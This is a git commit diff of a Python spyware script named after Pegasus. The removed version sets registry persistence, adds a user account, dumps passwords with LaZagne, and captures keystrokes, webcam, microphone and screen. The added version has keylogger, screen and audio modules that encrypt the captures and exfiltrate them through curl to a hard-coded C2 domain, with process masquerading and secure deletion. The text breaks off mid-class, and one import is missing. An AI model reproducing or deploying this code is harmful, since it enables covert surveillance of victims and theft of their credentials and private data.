Add files via upload

Author: ProjectZeroDays

src/exploits/zero-click_exploits/pegasus/combining_all_functionality/pegasus_spyware.py

@@ -1,115 +1,225 @@
-import sounddevice as sd
-import cv2
-from scipy.io.wavfile import write
-import wavio as wv
-import numpy as np
+# /src/exploits/zero-click_exploits/pegasus/pegasus_controller/pegasus_spyware.py
+
+import os
+import sys
+import json
 import time
-import pyautogui
-from pynput.keyboard import Listener
-import subprocess
-import shutil, os, subprocess
 import threading
-import smtplib
-from email.mime.multipart import MIMEMultipart
-from email.mime.text import MIMEText
-from email.mime.base import MIMEBase
-from email import encoders
-
-freq = 44100
-duration = 5
-
-def hide_file():
-    path = 'attrib +s +h "C:\\Users\\Dell\\OneDrive\\Desktop\\pegasus\\10.combining_all_functionality\\pegasus_spyware.py"'
-    subprocess.call(path, shell= True)
-    print("hiding_file")
-
-hide_file()
-
-def become_persistance():
-    subprocess.call("REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v pegasus /t REG_SZ /d 'C:\\Users\\Dell\\OneDrive\\Desktop\\pegasus\\PEGASUS\\pegasus.exe' ")
-    print("persistent ..!")
-
-become_persistance()
-
-def esculate_priv():
-    subprocess.run("net user pegasus /add")
-    print("esculated priv")
-
-esculate_priv()
-
-def capture_image():
-    camera = cv2.VideoCapture(0)
-    return_value, image = camera.read()
-    cv2.imwrite('capture_img'+'.png', image)
-    del(camera)
-
-capture_image()
-
-def record_audio():
-    recording = sd.rec(int(duration * freq),samplerate=freq, channels=2)
-    sd.wait()
-    write("recording0.wav", freq, recording)
-    encrypt_file("recording0.wav")
-
-def encrypt_file(file_path):
-    key = b'secret_key'
-    with open(file_path, 'rb') as f:
-        data = f.read()
-    encrypted_data = bytearray(data)
-    for i in range(len(encrypted_data)):
-        encrypted_data[i] ^= key[i % len(key)]
-    with open(file_path, 'wb') as f:
-        f.write(encrypted_data)
-
-record_audio()
-
-def capture_screen():
-    image = pyautogui.screenshot()
-    image = cv2.cvtColor(np.array(image),cv2.COLOR_RGB2BGR)
-    cv2.imwrite("screenshot.png", image)
-
-capture_screen()
-
-def save_passwd():
-    subprocess.call('python "C:\\Users\\Dell\\OneDrive\\Desktop\\pegasus\\LaZagne-2.4.3\\Windows\\laZagne.py" all > saved_password.txt' , shell = True)
-    subprocess.call("exit", shell= True)
-
-def getKey(key):
-    key = fixKey(key)
-    file = open('log.txt', 'a')
-    file.write(key.replace('\'', '') + '')
-    file.close()
-
-def fixKey(key):
-    key = str(key)
-    if key == 'Key.space':
-        return ' '
-    elif key == 'Key.enter':
-        return '\n'
-    return key
-
-def evade_detection():
-    os.rename("recording0.wav", "hidden_recording.wav")
-
-def validate_ai_integration():
-    pass
-
-def confirm_security_measures():
-    pass
-
-def ensure_deployment_methods():
-    pass
-
-def main():
-    thread2 = threading.Thread(target=save_passwd, args=())
-    thread2.start()
-
-    with Listener(on_press=getKey) as listener:
-        listener.join()
-
-main()
-
-evade_detection()
-validate_ai_integration()
-confirm_security_measures()
-ensure_deployment_methods()
+import tempfile
+import subprocess
+import hashlib
+import base64
+import shutil
+import stat
+from pathlib import Path
+from datetime import datetime
+
+# --- Imports for Module Functions ---
+try:
+    import cv2
+    import pyautogui
+    import sounddevice as sd
+    from scipy.io.wavfile import write
+    from pynput import keyboard
+except ImportError:
+    print("[-] Required libraries (opencv-python, pyautogui, sounddevice, scipy, pynput) not found.")
+    sys.exit(1)
+
+# --- Global Configuration ---
+# In a real deployment, this key and C2 details would be provided by a dropper or C2.
+ENCRYPTION_KEY = hashlib.sha256(b'PegasusSAP_Controller_Key_2026_V1').digest()
+C2_DOMAIN = "zeroclickexploits.ddns.net"
+C2_PORT = 443
+C2_ENDPOINT = f"https://{C2_DOMAIN}:{C2_PORT}/api/v1/telemetry"
+TARGET_ID = os.environ.get("TARGET_ID", "unknown")
+
+# --- Data Staging ---
+TEMP_DIR = tempfile.mkdtemp(prefix="pegasus_")
+STAGING_DIR = Path(TEMP_DIR)
+STAGING_DIR.mkdir(exist_ok=True)
+
+# --- Evasion and Anti-Forensics ---
+def _log_event(message, level='info'):
+    """Internal logger to prevent writing to disk."""
+    timestamp = datetime.now().isoformat()
+    print(f"[{timestamp}] [{level.upper()}] {message}")
+
+def hide_process():
+    """Conceptual placeholder for process hiding techniques."""
+    try:
+        if sys.platform.startswith('linux'):
+            import ctypes
+            libc = ctypes.CDLL('libc.so.6')
+            libc.prctl(15, "systemd".encode(), 0, 0, 0)
+        _log_event("Process masquerading as a system process.")
+    except Exception:
+        pass
+
+def encrypt_file_aes_gcm(file_path, key):
+    """Encrypts a file using AES-256 in GCM mode."""
+    try:
+        from Crypto.Cipher import AES
+        from Crypto.Random import get_random_bytes
+        nonce = get_random_bytes(12)
+        cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
+        with open(file_path, 'rb') as f:
+            plaintext_data = f.read()
+        ciphertext, auth_tag = cipher.encrypt_and_digest(plaintext_data)
+        encrypted_data = nonce + auth_tag + ciphertext
+        encrypted_file_path = file_path.with_suffix(file_path.suffix + ".enc")
+        with open(encrypted_file_path, 'wb') as f:
+            f.write(encrypted_data)
+        return encrypted_file_path
+    except ImportError:
+        _log_event("PyCryptodome not found, cannot encrypt.", 'error')
+        return None
+    except Exception as e:
+        _log_event(f"Encryption failed: {e}", 'error')
+        return None
+
+def secure_delete_file(file_path, passes=3):
+    """Securely deletes a file by overwriting it multiple times."""
+    try:
+        path = Path(file_path)
+        if not path.exists():
+            return
+        with open(path, "ba+") as f:
+            length = f.tell()
+            for _ in range(passes):
+                f.seek(0)
+                f.write(os.urandom(length))
+        path.chmod(stat.S_IWRITE)
+        path.unlink()
+    except Exception as e:
+        _log_event(f"Failed to securely delete {file_path}: {e}", 'error')
+
+def exfiltrate_data(file_path):
+    """Exfiltrates an encrypted file to the C2 server."""
+    try:
+        with open(file_path, 'rb') as f:
+            encrypted_data = f.read()
+        b64_data = base64.b64encode(encrypted_data).decode('utf-8')
+        payload = {
+            "type": "pegasus_module_data",
+            "timestamp": datetime.utcnow().isoformat() + "Z",
+            "target_id": TARGET_ID,
+            "filename": file_path.name,
+            "data": b64_data
+        }
+        json_payload = json.dumps(payload)
+        cmd = [
+            "curl", "-k", "-s", "-X", "POST",
+            "-H", "Content-Type: application/json",
+            "-H", "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
+            "-d", json_payload,
+            "--connect-timeout", "10",
+            "--max-time", "60",
+            C2_ENDPOINT
+        ]
+        result = subprocess.run(cmd, capture_output=True, text=True, timeout=70)
+        if result.returncode == 0:
+            _log_event(f"Successfully exfiltrated {file_path.name}.")
+            return True
+        else:
+            _log_event(f"C2 exfiltration failed. Status: {result.returncode}", 'error')
+            return False
+    except Exception as e:
+        _log_event(f"An error occurred during C2 exfiltration: {e}", 'error')
+        return False
+
+# --- Core Spyware Modules ---
+class KeyloggerModule(threading.Thread):
+    def __init__(self):
+        super().__init__(daemon=True)
+        self.log_path = STAGING_DIR / "keylog.txt"
+        self._stop_event = threading.Event()
+
+    def run(self):
+        _log_event("Keylogger module started.")
+        with open(self.log_path, 'a') as f:
+            f.write(f"\n--- Keylogger Session Start: {datetime.now()} ---\n")
+        def on_press(key):
+            if self._stop_event.is_set():
+                return False
+            try:
+                with open(self.log_path, 'a') as f:
+                    if hasattr(key, 'char') and key.char is not None:
+                        f.write(key.char)
+                    else:
+                        f.write(f' [{str(key)}] ')
+            except Exception as e:
+                _log_event(f"Keylogger write error: {e}", 'error')
+        with keyboard.Listener(on_press=on_press) as listener:
+            listener.join()
+        _log_event("Keylogger module stopped.")
+
+    def stop(self):
+        self._stop_event.set()
+
+    def exfiltrate_and_clear(self):
+        if self.log_path.exists() and self.log_path.stat().st_size > 0:
+            encrypted_path = encrypt_file_aes_gcm(self.log_path, ENCRYPTION_KEY)
+            if encrypted_path and exfiltrate_data(encrypted_path):
+                secure_delete_file(encrypted_path)
+                with open(self.log_path, 'w') as f:
+                    f.truncate(0)
+
+class ScreenCaptureModule(threading.Thread):
+    def __init__(self, interval=300): # 5 minutes
+        super().__init__(daemon=True)
+        self.interval = interval
+        self._stop_event = threading.Event()
+
+    def run(self):
+        _log_event("Screen capture module started.")
+        while not self._stop_event.is_set():
+            try:
+                timestamp = int(time.time())
+                img_path = STAGING_DIR / f"scr_{timestamp}.png"
+                screenshot = pyautogui.screenshot()
+                screenshot_cv = cv2.cvtColor(np.array(screenshot), cv2.COLOR_RGB2BGR)
+                cv2.imwrite(str(img_path), screenshot_cv)
+                _log_event(f"Screenshot captured: {img_path.name}")
+                encrypted_path = encrypt_file_aes_gcm(img_path, ENCRYPTION_KEY)
+                if encrypted_path and exfiltrate_data(encrypted_path):
+                    secure_delete_file(encrypted_path)
+                    secure_delete_file(img_path)
+            except Exception as e:
+                _log_event(f"Screenshot failed: {e}", 'error')
+            time.sleep(self.interval)
+        _log_event("Screen capture module stopped.")
+
+    def stop(self):
+        self._stop_event.set()
+
+class AudioCaptureModule(threading.Thread):
+    def __init__(self, duration=10, interval=600): # 10 second recording every 10 minutes
+        super().__init__(daemon=True)
+        self.duration = duration
+        self.interval = interval
+        self._stop_event = threading.Event()
+
+    def run(self):
+        _log_event("Audio capture module started.")
+        while not self._stop_event.is_set():
+            try:
+                timestamp = int(time.time())
+                wav_path = STAGING_DIR / f"aud_{timestamp}.wav"
+                freq = 44100
+                recording = sd.rec(int(self.duration * freq), samplerate=freq, channels=2)
+                sd.wait()
+                write(wav_path, freq, recording)
+                _log_event(f"Audio recorded: {wav_path.name}")
+                encrypted_path = encrypt_file_aes_gcm(wav_path, ENCRYPTION_KEY)
+                if encrypted_path and exfiltrate_data(encrypted_path):
+                    secure_delete_file(encrypted_path)
+                    secure_delete_file(wav_path)
+            except Exception as e:
+                _log_event(f"Audio recording failed: {e}", 'error')
+            time.sleep(self.interval)
+        _log_event("Audio capture module stopped.")
+
+    def stop(self):
+        self._stop_event.set()
+
+class VideoCaptureModule